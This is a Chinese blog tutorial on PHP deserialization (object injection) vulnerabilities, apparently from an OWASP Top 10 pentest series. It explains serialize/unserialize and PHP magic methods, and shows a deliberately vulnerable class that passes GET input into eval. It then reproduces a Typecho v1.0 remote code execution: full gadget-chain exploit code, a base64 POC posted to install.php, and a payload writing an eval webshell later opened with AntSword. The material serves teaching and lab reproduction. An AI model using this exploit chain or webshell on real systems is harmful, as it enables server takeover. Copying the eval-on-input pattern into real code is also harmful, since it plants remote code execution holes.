OWASP TOP 10(六)反序列化漏洞(序列化和反序列化、漏洞原理、PHP中的序列化和反序列化、魔术方法、Typecho_v1.0中的反序列化漏洞)

最新推荐文章于 2023-06-28 18:58:56 发布
最新推荐文章于 2023-06-28 18:58:56 发布
阅读量570 收藏 3
点赞数
分类专栏: # OWASP TOP 10 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45677119/article/details/111655933
版权

文章目录

反序列化漏洞

一、概述

1. 序列化和反序列化

序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。

也就是将数据结构或对象状态转换成可取用格式(如存成文件、存于缓冲、或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。

简单的说,序列化就是把一个对象变成可以传输的字符串,可以以特定的格式在进程之间跨平台、安全的进行通信。

而从一系列字节提取数据结构的反向操作,就是是反序列化(也称为解编组、deserialization)

2. 序列化的目的

  • 以某种存储形式使自定义对象持久化;

  • 将对象从一个地方传递到另一个地方。

  • 使程序更具维护性。

二、PHP中的序列化与反序列化

1. 概述

PHP反序列化漏洞也叫PHP对象注入,是一个常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。

漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。

反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通。

PHP中的序列化与反序列化,基本都是围绕serialize()和unserialize()
两个函数展开的。

2. 示例序列化与反序列化

序列化会将一个抽象的对象转换为字符串。

首先创建一个类:

<?php
class Student{
	public $name;
	public $sex;
	public $age;
	public $score;
}
?>

类名是Stuent,该类中有四个变量,将这个类实例化(创建一个对象), 将对象序列化为字符串:(当我们直接输出$stu1时会error,对象无法转换为字符串)

<?php
$stu1 = new Student();
$stu1 ->name = "tom";
$stu1 ->sex = true; 
$stu1 ->age = 18;
$stu1 ->score = 89.9;
echo serialize($stu1);
?>

运行结果:

O:7:"Student":4:    # Object:类名长度为7:"类名为Student":4个属性
{s:4:"name";s:3:"tom";s:3:"sex";b:1;s:3:"age";i:18;s:5:"score";d:89.900000000000006;}
{string:属性1长度:"属性1";.....}

反序列化:

$str =<<<HTML
O:7:"Student":4:{s:4:"name";s:3:"tom";s:3:"sex";b:1;s:3:"age";i:18;s:5:"score";d:89.900000000000006;}
HTML;
var_dump(unserialize($str));

运行结果:

object(Student)#2 (4) {
  ["name"]=>
  string(3) "tom"
  ["sex"]=>
  bool(true)
  ["age"]=>
  int(18)
  ["score"]=>
  float(89.9)
}

3. 反序列化漏洞

php反序列化漏洞也叫对象注入漏洞,当在php中创建一个对象后,可以通过serialize()函数把这个对象转化为一个字符串,便于传递和使用;之后再通过unserialize()函数​可以从已经存储的表示中创建php的值,恢复对象,在恢复对象时会调用 __wakeup() 成员函数,我们可以通过传入一个精心构造的序列化字符串,从而控制对象内部的变量甚至是函数,可以利用PHP中的魔术方法构造函数,魔术方法在一些特定情况下会被自动调用。

这里我们定义一个类,一个属性,一个方法,由于反序列化要使用序列化后的字符串比较麻烦,我们可以将序列化的结果用一个变量接收 $t

<?php
class Test{
	public $str = "hello";
	function __destruct(){
		@eval($this -> str);
	}
}

$test = new Test();
$t = serialize($test);
echo $t;
echo "<hr />";
var_dump(unserialize($t));
?>

运行结果:

在这里插入图片描述

那么我们是不是可以修改变量 $t 为一个更灵活的方式 $_GET[obj] ,然后可以通过 obj 赋值:

<?php
class Test{
	public $str = "hello";
	function __destruct(){
		@eval($this -> str);
	}
}

$test = new Test();
$t = $_GET['obj'];
echo $t;
echo "<hr />";
var_dump(unserialize($t));
?>

赋值并运行:

在这里插入图片描述

如果我们修改其中的值:

在这里插入图片描述

修改为phpinfo():

在这里插入图片描述

结果:为我们编译了phpinfo()

查找原因:该类中只有一个方法 __destruct(),方法中有一个函数eval,所以只可能是它,但我们并没有去调用该方法,它是怎么执行的?

PHP中的析构函数(destruct),当对象结束其生命周期时,系统自动执行析构函数;它与构造函数(construct)刚好相反,构造函数是在对象创建时自动调用。

- PHP中的魔术方法

__ 开头的方法,是PHP中的魔术方法,类中的魔术方法,在特定情况下会被自动调用。主要魔术方法如下。

__construct()              在创建对象时自动调用
__destruct()               在销毁对象时自动调用
__call()                   在对象中调用一个不可访问方法时,call() 会被调用
__callStatic()             在静态上下文中调用一个不可访问方法时调用
__get()                    读取不可访问属性的值时会被调用
__set()                    在给不可访问属性赋值时会被调用
__isset()                  当对不可访问属性调用isset() 或empty()时会被调用
__unset()                  当对不可访问属性调用unset() 时会被调用
__sleep()                  serialize()函数会检查类中是否存在一个魔术方法__sleep(),如果存在,该方法会先被调用,然后才执行序列化操作
__wakeup()                 unserialize()函数会检查是否存在一个__wakeup() 方法,如果存在,则会先调用__wakeup方法,预先准备对象需要的资源。
__toString( )              toString()方法用于一个类被当成字符串时应怎样回应。
__invoke()                 当尝试以调用函数的方式调用一个对象时会被自动调用
__set_state()              自PHP 5.1.0起当调用var_export()导出类时,此静态方法会被调用。
__clone()                  当复制完成时,如果定义了__clone() 方法,则新创建的对象(复制生成的对象)中的__clone()方法会被调用,可用于修改属性的值(如果有必要的话)。
- Typecho_v1.0中的反序列化漏洞
  1. 搭建网站(需要手动创建数据库)

在这里插入图片描述
在这里插入图片描述

  1. 我们使用exp生成反序列化后的对象(字符串),并且进行base64编码。

EXP代码:

<?php
class Typecho_Feed{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;

    public function __construct(){
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title' => '1',
            'link' => '1',
            'date' => 1508895132,
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}

class Typecho_Request{
    private $_params = array();
    private $_filter = array();
    
    public function __construct(){
   		 //注入的 payload
        $this->_params['screenName'] = 'phpinfo()';
        $this->_filter[0] = 'assert';
    }
}

$exp = array(
    'adapter' => new Typecho_Feed(),
    'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));
?>

生成的poc:

YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=
  1. 漏洞存在
    我们将poc代码赋值给 __typecho_config 变量,然后通过POST方式提交到链接 http://192.168.40.129/Typechov1/install.php?finish= ,并且设置 Referer=http://192.168.40.129/typechov11/

在这里插入图片描述

成功弹出phpinfo界面。

  1. 注入一句话木马
$this->_params['screenName'] = "fputs(fopen('shell.php','w'),'<?php @eval(\$_REQUEST[777])?>')";

再次生成POC,注入参数:

在这里插入图片描述

  1. 成功生成shell.php,使用中国蚁剑连接

在这里插入图片描述

Tigirs
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA靶场,集成了owasp top 10漏洞
03-28
DVWA靶场,集成了owasp top 10漏洞,可以在这里面进行学习漏洞原理、利用和危害
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
Java反序列化漏洞利用工具.zip
04-10
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
OWASP Top 10 2017 10项最严重的 Web 应用程序安全风险
01-11
OWASP Top 10 2017 10项最严重的 Web 应用程序安全风险
web漏洞类型概述(owasp top10笔记)
xiaobai_20190815的博客
06-08 3241
owasp top10
PHP反序列化漏洞研究及原理
彼岸花苏陌的博客
11-29 463
前言: 反序列化OWASP 2017的一个比较大威胁的漏洞 而且一般安全类的问代码级的漏洞一般会问到这个,所以记录一下。 什么是反序列化? 首先引进两个函数,serialize(序列化函数)和unserialize(反序列化函数) 序列化反序列化作用: 序列化: 对象转换为字符串的过程 这么讲可能有点晦涩难懂,上代码,看注释应该能看懂 <?php class student//定义类 { public $username='xiaoming';//定义对象 } $s=new stude
自学网络安全(白帽黑客)必看!OWASP十大漏洞解析!
m0_74131821的博客
06-12 5025
在学习网络安全之前,需要总体了解安全趋势和常见的Web漏洞,在这里我首推了解OWASP,因为它代表着业内Web安全漏洞的趋势
漏洞分析之Typecho二连爆
hl1293348082的专栏
04-04 1921
这段时间 Typecho 在十几天之内连续爆了两个最高可 getshell 的洞,先是 SSRF 可打内网,再是反序列化直接前台 getshell ……安全性这方面堪忧…… 跟着师傅们的文章,简单地分析一下这两次漏洞,第二个反序列化的洞的溯源思路值得学习一波~ 虽然很多大号都分析过这个漏洞,写的也很详细,我作为一个初学者自己分析学习一下也是很有必要的,官方人员已经对这些漏洞进行的及时的修补并且推出了最新的版本,如果有用到这个博客的同学赶紧升级。 Typecho 1.0 (14.10.10) —— SS
记一次typecho反序列化漏洞的复现(第一次写poc版)
m0_62100902的博客
06-28 1123
经过一系列的代码审计,终于找到一个可以利用的点,其余的属性全都是写死了的,也就是静态this的调用方式,而这里不是静态的,它可以是别的对象里面去调用这个属性,那么我们可以想到一种魔术方法:__get(),这个魔术方法是当对象调用不存在的属性时候会自动去调用这个魔术方法,那么我们需要去找到一个既有__get()魔术方法的又没有screenName这个属性的对象(这里终于来点感觉了),继续在代码审计工具里面找__get()说一说我的个人理解吧。举个例子,php与java之间是如何相互传输的呢?
OWASP-A8:示例代码演示了前10-2017 A8-不安全反序列化漏洞类别
05-15
这个简单的Web应用程序反序列化用户提供的数据。 预期的行为是用户将提交类的base64编码的序列化实例。警告运行此Web应用程序将使您暴露于严重的远程执行代码漏洞。 不要公开应用程序服务器,而只能在本地,...
Owasp Top10 漏洞笔记
08-27
Owasp Top10 漏洞笔记
计算机病毒与防护:OWASPTOP与常见漏洞讲解下.ppt
06-10
* * * * * * * * * * * * OWASP TOP10与常见 漏洞讲解下 失效的访问控制就是越权访问漏洞 A5:2017失效的访问控制(业务逻辑漏洞) 失效的访问控制就是越权访问漏洞 A5:2017失效的访问控制(业务逻辑漏洞) 失效的访问...
可视化呈现的暗网攻击相关议题.pdf
08-07
班涛对巨大事实流量或海量数据存储数据处理的数学理论和实际应用均有深刻研究,能够从P2P数据识别有意义的信息,通过机器学习、自主学习等处理方法,对其异常进行识别。目前与世界各大安全软件合作,得到海量...
渗透测试-----网络漏洞扫描(原理步骤、AWVS、OpenVAS、“永恒之蓝”测试)
热门推荐
Pluto.的博客
12-14 1万+
文章目录渗透测试网络漏洞扫描一、概述1. 简述2. 漏洞扫描原理3. 漏洞扫描器原理4. Web漏洞扫描步骤二、AWVS1. 概述2. 安装3. web扫描器三、OpenVAS1. 概述2. kali上安装1)更新kali源2)安装openvas3)其他说明3. 基本步骤1)扫描目标2)扫描策略3)扫描任务4)扫描完成5)扫描报告4. MSF概述5. 测试 ms17-010--“永恒之蓝” 渗透测试 网络漏洞扫描 一、概述 1. 简述 如何及时、快速发现Web应用安全漏洞,并且修补安全漏洞,减轻或消除Web
提权(概述、水平/垂直越权、windows/linux提权、反弹shell、Linux_Exploit_Suggester、searchsploit)
Pluto.的博客
12-24 4982
文章目录提权一、概述1. 什么是提权?2. 水平越权&垂直越权3. 分类- windows1. 系统漏洞提权1.1 基于windows20031.2 基于windows2008- Linux 提权 一、概述 1. 什么是提权? 提权即提高自己在服务器的权限,主要针对网站入侵过程,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得该服务器权限。 2. 水平越权&垂直越权 水平越权:指相同权限下不同的用户可以互相访问; 垂直越权:指使用权限低的用户可以访问到权限较高的用户; 比如:
渗透测试-----信息收集(通过DNS解析找IP地址、CDN、IP查询、IP物理地址、搜索引擎、网站信息收集)
Pluto.的博客
12-14 3351
文章目录渗透测试信息收集一、通过DNS解析找IP地址1. ping命令2. nslookup命令3. dig工具4. dnsenum5. 站长工具二、CDN1. 概述2. 绕过CDN查找网站真实IP2.1 查看是否使用CDN2.2 绕过 CDN 查找网站真实 IP三、IP查询四、IP2物理地址五、利用搜索引擎搜集信息1. google hacking2. 钟馗之眼1. 概述2. 部分语法3. shodan、网站信息收集1. 指纹信息2. web服务器信息 渗透测试 信息收集 一、通过DNS解析找IP地址
漏洞复现】Apache Solr 远程命令执行漏洞(CVE-2019-0193)
Pluto.的博客
12-27 2994
文章目录Vulhub漏洞复现Apache Solr远程命令执行漏洞复现(CVE-2019-0193)一、漏洞概述二、漏洞复现1. 复现步骤2. 利用该漏洞getshell Vulhub漏洞复现 Apache Solr远程命令执行漏洞复现(CVE-2019-0193) 一、漏洞概述 Apache Solr搜索服务,它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引(solr 索引库用 core
渗透测试执行标准、流程
Pluto.的博客
12-14 2990
文章目录渗透测试一、渗透测试执行标准 渗透测试 一、渗透测试执行标准 PTES:http://www.pentest-standard.org/ PTES技术指南:http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines PTES的主要特性和优势如下: 它是非常全面的渗透测试框架,涵盖了渗透测试的技术方面和其他重要方面,如范围蔓延(scope creep) 、报告,以及渗透测试人员保护自身的方法; 它介绍了多数测试任务的具体方法
反序列化漏洞属于OWASP TOP10漏洞
最新发布
10-22
是的,反序列化漏洞属于OWASP TOP10漏洞之一。它是指攻击者利用Java反序列化机制漏洞,将恶意数据注入到应用程序,从而导致应用程序受到攻击。攻击者可以通过反序列化漏洞来执行任意代码、获取敏感信息、绕过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值